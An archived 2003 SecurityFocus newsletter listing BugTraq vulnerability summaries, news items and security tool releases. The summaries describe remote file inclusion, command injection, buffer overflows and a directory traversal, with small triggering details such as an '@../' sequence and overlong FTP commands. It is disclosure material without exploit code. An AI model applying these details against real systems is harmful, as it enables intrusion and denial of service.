SecurityFocus Newsletter #185

SecurityFocus Newsletter #185

Secure Your Servers

Secure your servers with 128-bit SSL encryption! Grab your copy of VeriSign's FREE Guide, "Securing Your Web site for Business," and you'll learn everything you need to know about using 128-bit SSL to encrypt your e-commerce transactions, secure your corporate intranets and authenticate your Web sites. 128-bit SSL is serious security for your online business. Get it now! Secure your servers with 128-bit SSL encryption! Grab your copy of VeriSign's FREE Guide, "Securing Your Web site for Business," and you'll learn everything you need to know about using 128-bit SSL to encrypt your e-commerce transactions, secure your corporate intranets and authenticate your Web sites. 128-bit SSL is serious security for your online business. Get it now!

http://www.verisign.com/cgi-bin/go.cgi?a=n09440117580057000

I. FRONT AND CENTER

1. Exchange 2000 in the Enterprise: Tips and Tricks Part Three
2. Secure MySQL Database Design
3. Richard Clarke's Legacy of Miscalculation
4. SecurityFocus DPP Program
5. InfoSec World Conference and Expo/2003(March10-12,2003,Orlando,FL) II. BUGTRAQ SUMMARY
6. Util-Linux mcookie Cookie Generation Weakness
7. IndyNews delMediaFile() File Deletion Vulnerability
8. IndyNews manageMedia() File Deletion Vulnerability
9. IndyNews HTML Injection Vulnerability
10. Apple MacOS Classic TruBlueEnvironment Environment Variable...
11. Apple File Protocol iDrive Administrator Login Weakness
12. PHP-Board User Password Disclosure Vulnerability
13. Kietu Hit.PHP Remote File Inclusion Vulnerability
14. DotBr PHPInfo Environment Information Disclosure Vulnerability
15. DotBr Config.Inc Information Disclosure Vulnerability
16. DotBr Exec.PHP3 Remote Command Execution Vulnerability
17. DotBr System.PHP3 Remote Command Execution Vulnerability
18. IBM Lotus Domino HTTP Redirect Buffer Overflow Vulnerability
19. IBM Lotus Domino Web Server iNotes s_ViewName/Foldername...
20. IBM Lotus iNotes ActiveX Control Buffer Overflow Vulnerability
21. BisonFTP Long Command Denial of Service Vulnerability
22. BisonFTP Information Disclosure Vulnerability
23. Microsoft Riched20.dll Attribute Buffer Overflow Vulnerability
24. PHP CGI SAPI Code Execution Vulnerability
25. Netcharts Server Chunked Encoding Information Leakage...
26. D-Forum Remote File Include Vulnerability
27. BitchX Malformed RPL_NAMREPLY Denial Of Service Vulnerability III. SECURITYFOCUS NEWS ARTICLES
28. Airport limo firm allegedly hobbled by revenge hack
29. How to get an ATM PIN number in 15 guesses
30. Crypto attack against SSL outlined
31. States take step toward sharing cyberthreat data IV. SECURITYFOCUS TOP 6 TOOLS
32. PlexCrypt v3.1
33. Traffik tool Troll v0.7
34. LinuxMagic magic-smtpd v0.7.0
35. snortalog v1.7.0
36. labrea v2.5b1
37. Looper Event / Alert System v0.20
38. SECURITYJOBS LIST SUMMARY
39. Technical security reconciliation (Thread)
40. Internship in São Paulo / Brazil (Thread)
41. Forensic and Information Security Analyst Looking for a home in...
42. Systems Engineer - Application Level Security (Thread)
43. Security Sales Professionals Needed (Thread)
44. Looking for Job in Italy (Thread)
45. Network Security Engineer - NJ (Thread)
46. Needed Penetration Testers (Thread)
47. Senior Security Consultant needed in Washington DC (Thread)
48. looking for Security Professionals in India (Thread)
49. Infrastructure Security Manager- Rhode Island (Thread)
50. Sunny Florida - Application Security Engineer (Thread) VI. INCIDENTS LIST SUMMARY
51. Scans on TCP port 135 (Thread)
52. Weird Profile in Documents and Settings (Thread)
53. Distributed spam-based DoS in progress (Thread)
54. Dead thread -- Distributed spam-based DoS in progress (Thread)
55. port 17300 probe fingerprint analysis (Thread)
56. Kuang2 strikes again, is it just me? (Thread)
57. www.nopop.net (Thread)
58. Web Defacement (Thread)
59. mIRC Trojan Variant - port 445 worm/Trojan (Thread)
60. ano@ano.com ftpd dip.t-dialin.net (Thread)
61. Incidents list administrivia and introductions... (Thread)
62. Spies on Your PC HDrv (Thread)
63. ICMP Destination Unreachable, Administratively Prohibited...
64. S4T4N1C Web Defacement (Thread) VII. VULN-DEV RESEARCH LIST SUMMARY
65. Call For Papers Announcement: Black Hat Briefings Amsterdam
66. VisualBasic auditing2 (Thread)
67. VisualBasic auditing (Thread)
68. Is this an off-by-one overflow? (Thread)
69. [argv] BitchX-353 Vulnerability (Thread)
70. A different bash blues (Thread)
71. glibc glob_filename() recurse call stack overflow (Re[2]: Bash...
72. glibc glob_filename() recurse call stack overflow (Re[2]: Bash...
73. Windows 2000 Static arp not static (Thread)
74. Administrivia: Bash Blues (Thread)
75. Bash Blues. (Thread) VIII. MICROSOFT FOCUS LIST SUMMARY
76. Windows2000 QuickLaunch (Thread)
77. MS Software Update Service (Thread)
78. AW: MS Software Update Service (Thread)
79. Restricting CmdExec Rights to Sysadmin (Thread)
80. Windows station permissions, remote control programs,lower...
81. AW: Restricting CmdExec Rights to Sysadmin (Thread)
82. [despammed] Defeating password cracking (Thread)
83. Windows station permissions, remote control programs, lower...
84. Defeating password cracking (Thread)
85. Website inside or outside domain (Thread)
86. Ye Olde OWA Topic (Was Website inside or outside domain)...
87. Unhappy face icon on NT 4 workstation (Thread)
88. SecurityFocus Microsoft Newsletter #125 (Thread)
89. website inside or outside the domain? (Thread)
90. Windows 2000 Static arp not static (Thread) IX. SUN FOCUS LIST SUMMARY
91. NO NEW POSTS FOR THE WEEK ENDING 02.21.03
92. LINUX FOCUS LIST SUMMARY
93. entropy + openSSL question (Thread)
94. LKM Trojan installed (Thread)
95. openSSL Key generation (Thread) XI. SPONSOR INFORMATION
96. FRONT AND CENTER

    ---

97. Exchange 2000 in the Enterprise: Tips and Tricks Part Three By Timothy M. Mullen

This is the second installment in a two-part series on securing Exchange 2000 in the enterprise. The last segment addressed the security ramifications of publishing mail content to the Internet via Outlook Web Access. This installment will discuss configuring IPSec between front-end and back-end OWA Servers as well as headers.

http://online.securityfocus.com/infocus/1668

2. Secure MySQL Database Design
by Kristy Westphal

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

When it comes to installing software, secure design is often the last consideration. The first goal is usually just to get it to work. This is particularly true of databases. Databases are commonly referred to the keys to the kingdom: meaning that once they are compromised, all the valuable data that is stored there could fall into the hands of the attacker. With this in mind, this article will discuss various methods to secure databases, specifically one of the most popular freeware databases in use today, MySQL.

http://online.securityfocus.com/infocus/1667

3. Richard Clarke's Legacy of Miscalculation By George Smith

The outgoing cybersecurity czar will be remembered for his steadfast belief in the danger of Internet attacks, even while genuine threats developed elsewhere.

http://online.securityfocus.com/columnists/143

4. SecurityFocus DPP Program

Attention Universities!! Sign-up now for preferred pricing on the only global early-warning system for cyber attacks - SecurityFocus DeepSight Threat Management System.

Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)

Optional Workshops March 8, 9, 12, 13, & 14 Vendor Expo March 10 & 11

Solutions to today’s security concerns; hands-on experts; blockbuster vendor expo; the CISO Executive Summit; invaluable networking opportunities. InfoSec World has it all!

Go to: http://www.misti.com/10/os03nl37inf.html

II. BUGTRAQ SUMMARY

1. Util-Linux mcookie Cookie Generation Weakness BugTraq ID: 6855 Remote: Yes Date Published: Feb 14 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6855 Summary:

util-linux is a freely available, open source software package that provides some implementations of standard UNIX utilities, such as login. Included with util-linux is the mcookie utility that is used to generate random cookies for use with X authentication.

A weakness has been reported for the mcookie utility where cookies may be generated in a predictable manner. The weakness occurs because mcookie uses /dev/urandom to generate cookies.

This may be exploited by an attacker to guess cookie values to steal credentials of users who use X authentication.

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Information obtained in this manner may be used by the attacker to launch further attacks against vulnerable systems and users.

2. IndyNews delMediaFile() File Deletion Vulnerability BugTraq ID: 6856
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6856
Summary:

IndyNews is a module designed for integration with the PHP-Nuke web portal software.

A vulnerability has been discovered in the IndyNews module available for PHP-Nuke. The problem occurs in the delMediaFile() function and may allow an unauthorized attacker to delete media files. The susceptible files are only those that have been included in an approved article. This issue could be exploited to obstruct a website's ability to distribute various files.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated accordingly as more information is made available.

3. IndyNews manageMedia() File Deletion Vulnerability BugTraq ID: 6857
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6857
Summary:

IndyNews is a module designed for integration with the PHP-Nuke web portal software.

A vulnerability has been discovered in the IndyNews module available for PHP-Nuke. The problem occurs in the manageMedia() function and may allow an unauthorized attacker to delete or modify various files.

Can't find what you're looking for?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Exploitation of this issue may allow an attacker to influence the upload location of remote PHP files, potentially making it possible to execute arbitrary PHP commands.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated accordingly as more information is made available.

4. IndyNews HTML Injection Vulnerability BugTraq ID: 6858
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6858
Summary:

IndyNews is a module designed for integration with the PHP-Nuke web portal software.

A vulnerability has been discovered in the IndyNews module available for PHP-Nuke. Due to insufficient sanitization of HTML tags it is possible to embed HTML code within the 'alt' tags of a news article. When the news article is viewed by an unsuspecting user the embedded code will be executed within the context of the site visited.

This issue could be exploited by taking advantage of a bug found in the editMediaDescr() and editMediaTempDescr() functions. Through the malicious use of these functions it is possible for an unauthorized user to modify the 'alt' tags of a proposed or already displayed news article.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated accordingly as more information is made available.

5. Apple MacOS Classic TruBlueEnvironment Environment Variable Privilege Escalation Vulnerability BugTraq ID: 6859
Remote: No
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6859
Summary:

Don't know where to look next?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Apple MacOS X includes a Classic emulator to support applications written for Classic versions of the operating system.

Apple has released a client security update which details a vulnerability in the Apple MacOS Classic environment for MacOS X, which may lead to elevation of privileges. This issue exists in TruBlueEnvironment, which is included in the emulator.

It has been reported that an environment variable used by TruBlueEnvironment may be changed to cause arbitrary local files to be overwritten or created. The environment variable is used to define a location to output debugging information to a file.

TruBlueEnvironment will create or overwrite the debugging file with world-writeable privileges, depending on the umask of the process creating the file. The file will not be executable when it is created. However, a facility such as cron may potentially run the file through a shell interpreter. This may cause the file to run with elevated privileges, resulting in privilege escalation. A denial of service is also possible if critical system files are corrupted by the attacker.

6. Apple File Protocol iDrive Administrator Login Weakness BugTraq ID: 6860
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6860
Summary:

Apple File Protocol (AFP) is used with Apple's 'iDisk' feature to allow systems to store files on Apple's site.

The AFP allows a system administrator to log onto a system as a normal user using administration credentials. This is the default behaviour. When authenticating, it is possible for an attacker to obtain the administrator credentials by intercepting data.

Further details about this issue are not known at this time. This BID will be updated as further information becomes available.

Confused? Frustrated?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

7. PHP-Board User Password Disclosure Vulnerability BugTraq ID: 6862
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6862
Summary:

php-board is web forum software.

A vulnerability has been reported in php-board which may disclose sensitive information to remote attackers. This flaw exists in the
'login.php' script.

php-board user information is stored in flat files on the system hosting the software. Access to the files via the web is not sufficiently restricted. Remote attackers may request user files and gain access to php-board user and administrative passwords. The attacker must know the name of the user whose file they are requesting.

The attacker may use the disclosed credentials to perform actions on the php-board system as the user.

8. Kietu Hit.PHP Remote File Inclusion Vulnerability BugTraq ID: 6863
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6863
Summary:

Kietu is web-based software to tracking web site usage statistics. It is implemented in PHP.

A flaw exists in the Kietu 'hit.php' script may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file. An attacker may exploit this to include a malicious PHP script named 'config.php' from a remote host, resulting in execution of arbitrary commands with the privileges of the webserver process.

Call Pantek today for Open Source Technical Support at 1-877-546-8934 - 24/7/365

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

9. DotBr PHPInfo Environment Information Disclosure Vulnerability BugTraq ID: 6864
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6864
Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host a poll.

DotBr may disclose sensitive information to remote attackers about the environment of the system hosting the software. This is due to the use of the PHP phpinfo() function in the 'foo.php3' script. This may disclose version information and path information to the attacker.

This information may be helpful in mounting further attacks against the system.

1. DotBr Config.Inc Information Disclosure Vulnerability BugTraq ID: 6865 Remote: Yes Date Published: Feb 15 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6865 Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host polls. DotBr is backended by a MySQL database.

The DotBr configuration file (config.inc) may potentially disclose sensitive information to remote attackers. This issue occurs because the configuration file does not have the proper PHP file extension in the default installation, and may be displayed by the webserver instead of handled by the PHP interpreter. Database authentication credentials and other information may be disclosed as a result.

The attacker may use this information in attempts to gain unauthorized access to other resources.

1. DotBr Exec.PHP3 Remote Command Execution Vulnerability BugTraq ID: 6867 Remote: Yes Date Published: Feb 15 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6867 Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host polls.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

The DotBr 'exec.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data before it is passed through the PHP passthru() function. If exploited, the function will invoke the underlying shell with attacker-supplied parameters.

Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process.

1. DotBr System.PHP3 Remote Command Execution Vulnerability BugTraq ID: 6866 Remote: Yes Date Published: Feb 15 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6866 Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host polls.

The DotBr 'system.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data before it is passed through the PHP system() function. If exploited, the function will invoke the underlying shell with attacker-supplied parameters.

Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process.

1. IBM Lotus Domino HTTP Redirect Buffer Overflow Vulnerability BugTraq ID: 6870 Remote: Yes Date Published: Feb 17 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6870 Summary:

Lotus Domino Server is an application framework for web based collaborative software. It runs on multiple platforms including Microsoft Windows and Unix.

It has been reported that Lotus Domino 6 is affected by a buffer overflow vulnerability. The condition occurs when the server constructs a HTTP redirect response.

According to the report, the client-supplied "HOST" HTTP header field is copied into a local buffer without bounds checking. Consequently, a buffer overflow occurs if the HOST parameter is of excessive length.

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Attackers may exploit this vulnerability by identifying and then requesting, with a malicious HOST parameter in the request header, a specific document that causes the server to respond with a redirect.

Successful exploitation of this vulnerability may result in attackers gaining control of affected servers.

1. IBM Lotus Domino Web Server iNotes s_ViewName/Foldername Buffer Overflow Vulnerability BugTraq ID: 6871 Remote: Yes Date Published: Feb 17 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6871 Summary:

Lotus Domino Server is an application framework for web based collaborative software. It runs on multiple platforms including Microsoft Windows and Unix.

Lotus Domino iNotes Web Server does not perform adequate bounds checking on the s_ViewName/Foldername options of the PresetFields parameter. A buffer overflow condition can occur if excessively long strings are supplied as values for these fields when requesting web based mail services. This could result in sensitive areas of memory being overwritten to allow attacker-supplied code to be executed. This code would be executed in the security context of the account running the Domino Web Services.

1. IBM Lotus iNotes ActiveX Control Buffer Overflow Vulnerability BugTraq ID: 6872 Remote: Yes Date Published: Feb 17 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6872 Summary:

IBM Lotus iNotes is a web based messaging/collaboration application. Installation of support for iNotes on client systems includes an ActiveX control, "Lotus Domino Session ActiveX Control".

A buffer overflow vulnerability is reportedly present in this control. The condition is in the method "InitializeUsingNotesUserName()" and may be triggered if the method is called with a parameter of excessive length.

Maclious web content may invoke the control and exploit the vulnerability to execute instructions on target client systems. Furthermore, other applications which use the MSIE HTML rendering component may also be vulnerable if ActiveX support is enabled. It should be noted that any code executed would run with the privileges of the user who started MSIE.

1. BisonFTP Long Command Denial of Service Vulnerability BugTraq ID: 6869 Remote: Yes Date Published: Feb 17 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6869 Summary:

BisonFTP is an FTP daemon available for Windows based systems.

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

The BisonFTP daemon is prone to a denial of service condition when issued certain commands by the remote client.

If the client issues an FTP command such as 'cwd' or 'ls' containing 4300 bytes of data or more, the CPU usage on the system will increase to 100%. This results in the host being unavailable until the connection is closed by the client.

1. BisonFTP Information Disclosure Vulnerability BugTraq ID: 6873 Remote: Yes Date Published: Feb 17 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6873 Summary:

BisonFTP Server is an FTP daemon that is available for Windows based systems.

The BisonFTP server does not properly sanitize directory traversal sequences from user input. This allows users to issue an 'ls' command using the sequence '@../' in order to gain a file listing outside of the FTP root. Information obtained could be used to mount further attacks against the system.

1. Microsoft Riched20.dll Attribute Buffer Overflow Vulnerability BugTraq ID: 6874 Remote: No Date Published: Feb 17 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6874 Summary:

Rich Text Format (RTF) files are parsed by the riched20.dll library on Windows platforms. This library is included in most versions of Windows and may also be installed by other applications that are required to parse .rtf files.

Reportedly, it is possible to overrun a buffer in riched20.dll, causing the calling application (such as Microsoft Outlook or Word) to fail. This buffer can be overrun by including more than 65536 bytes of data in an attribute label contained in the .rtf file. Arbitrary code execution may be possible.

This vulnerability may be related to BID 807.

• Some reports indicate that this vulnerability could not be reproduced on riched20.dll v.3.0 (5.30.23.1200) running on Windows NT.
  1. PHP CGI SAPI Code Execution Vulnerability BugTraq ID: 6875 Remote: Yes Date Published: Feb 17 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/6875 Summary:

PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems.

Can't find what you're looking for?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

An unspecified vulnerability has been reported in the CGI SAPI of PHP version 4.3.0.

Direct access to the CGI binary can be prevented by using the configuration option '--enable-force-cgi-redirect' and the php.ini option
'cgi.force_redirect'.

The report states that an unspecified bug could render these options useless, allowing a remote user to directly access the CGI binary. This could allow an attacker to read any file that is readable by the web server user, or to potentially execute arbitrary PHP code. The attacker would have to be able to inject the PHP code into a file accessible by the CGI binary, such as the web server access logs.

20. Netcharts Server Chunked Encoding Information Leakage Vulnerability BugTraq ID: 6877
Remote: Yes
Date Published: Feb 18 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6877
Summary:

NetCharts Server provides multi-platform data connectivity. Combined servlet engine, graphics engine and scheduling features.

It has been reported that Netcharts Server is unable to sufficiently handle invalid chunked encoded HTTP requests.

Although Query-Response communication timing is reportedly difficult to predict, One scenario may be; An attacker attempting to desynchronize the Netcharts server in an attempt to lead valid Netcharts Server users to a specified response. The attacker may achieve this condition by flooding the Netcharts Server communication channels with an attacker-supplied response.

This may lead to sensitive information leakage or network performance degradation as a result of the attackers attempts to exploit this condition.

Don't know where to look next?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

21. D-Forum Remote File Include Vulnerability BugTraq ID: 6879
Remote: Yes
Date Published: Feb 18 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6879
Summary:

D-Forum is a freely available discussion forum written in PHP.

D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the header.php3 and footer.php3 pages existing in the /includes folder.

Under some circumstances, it is possible for remote attackers to influence the include path for these scripts to point to an external file on a remote server by manipulating the '$my_header' and '$my_footer' URI parameters.

If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the webserver.

22. BitchX Malformed RPL_NAMREPLY Denial Of Service Vulnerability BugTraq ID: 6880
Remote: Yes
Date Published: Feb 18 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6880
Summary:

BitchX is a freely available, open source IRC client. It is available for Unix, Linux, and Microsoft operating systems.

A problem with BitchX could make it possible for a malicious IRC server to crash a vulnerable client.

Confused? Frustrated?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

It has been reported that BitchX does not properly handle some types of replies contained in the RPL_NAMREPLY numeric. When a malformed reply is received by the client, the client crashes, resulting in a denial of service.

The problem occurs through the handling of the 353 IRC numeric. It is suspected that this vulnerability may also make possible the execution of arbitrary code. In the event that this is possible, code executed through this vulnerability would be in the context of the BitchX user. This could allow a remote attacker access to the system on which the affected client is running with the privileges of the BitchX user.

III. SECURITYFOCUS NEWS AND COMMENTARY

1. Airport limo firm allegedly hobbled by revenge hack By Kevin Poulsen

Terminated network administrator is charged with a retaliatory strike against former employer's systems.

http://online.securityfocus.com/news/2567

2. How to get an ATM PIN number in 15 guesses By John Leyden, The Register

Cambridge researchers have documented a worrying PIN cracking technique against the hardware security modules commonly used by bank ATMs.

http://online.securityfocus.com/news/2584

Call Pantek today for Open Source Technical Support at 1-877-546-8934 - 24/7/365

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

3. Crypto attack against SSL outlined
By John Leyden, The Register

Swiss security researchers have discovered an attack against implementations of the ubiquitous SSL protocol that could potentially compromise email passwords, though not ecommerce transactions.

http://online.securityfocus.com/news/2583

4. States take step toward sharing cyberthreat data By William Jackson, TechNews.com

Thirteen states, led by New York, last weekend conducted a communications exercise that could lead to a new, multistate information sharing and analysis center.

http://online.securityfocus.com/news/2553

IV. SECURITYFOCUS TOP 6 TOOLS

1. PlexCrypt v3.1 by plexobject Relevant URL: http://www.plexobject.com/software/plexcrypt/index.html Platforms: AIX, HP-UX, IRIX, Linux, POSIX, Solaris, SunOS, Windows 2000, Windows 95/98, Windows NT Summary:

PlexCrypt is a GUI that allows a set of files or folders to compress using the Zip format. In addition, it encrypts and decrypts a set of files or a set of folders using AES, Blowfish, CAST, DES, ElGamal, IDEA, IES, RC4, RC6, RSA, Rijndael, Serpent Skipjack, Twofish, etc. It allows users to create digital signatures and digest and verify them. It also allows users to create and manage digital certificates for encryption and signatures.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

2. Traffik tool Troll v0.7
by Alexander Newald alexander@newald.de
Relevant URL:
http://linux.newald.de/
Platforms: N/A
Summary:

The Traffik Tool Troll is a traffic monitoring and managing skript. Traffic statistics are generated by port, hour, day, month, and year. You can define a special period for your needs. The script is written in Perl and uses iptables and MySQL to get and store the traffic.

3. LinuxMagic magic-smtpd v0.7.0
by LinuxMagic Inc. magicsmtpd@linuxmagic.com Relevant URL:
http://www.linuxmagic.com/opensource/magicmail/magic-smtpd/ Platforms: Linux, POSIX
Summary:

MAGIC-SMTPD is a drop-in replacement for Dan Bernstein's qmail-smtpd, and was originally designed to be part of the LinuxMagic Magic Mail Server. This opensource version has been released to allow others to benefit from its anti-spam components, and valid user checking to reduce server loads and spam volumes. It is designed to support stock qmail installations, qmail/vpopmail installations, and database connectivity. Designed for ISP service, this will work for all mail servers large and small.

4. snortalog v1.7.0
by jeremy chartier
Relevant URL:
http://jeremy.chartier.free.fr/snortalog/ Platforms: UNIX
Summary:

Snortalog (formerly known as Snort-ng) is a powerful Perl script that summarizes Snort logs, making it easy to view any network attacks detected by Snort. It can generate charts in HTML. It works with all versions of Snort, and can analyze logs in two formats: syslog alerts and text alerts. It does not include a database for maximum performance.

5. labrea v2.5b1
by Tom Liston tliston@hackbusters.net
Relevant URL:
http://labrea.sourceforge.net/
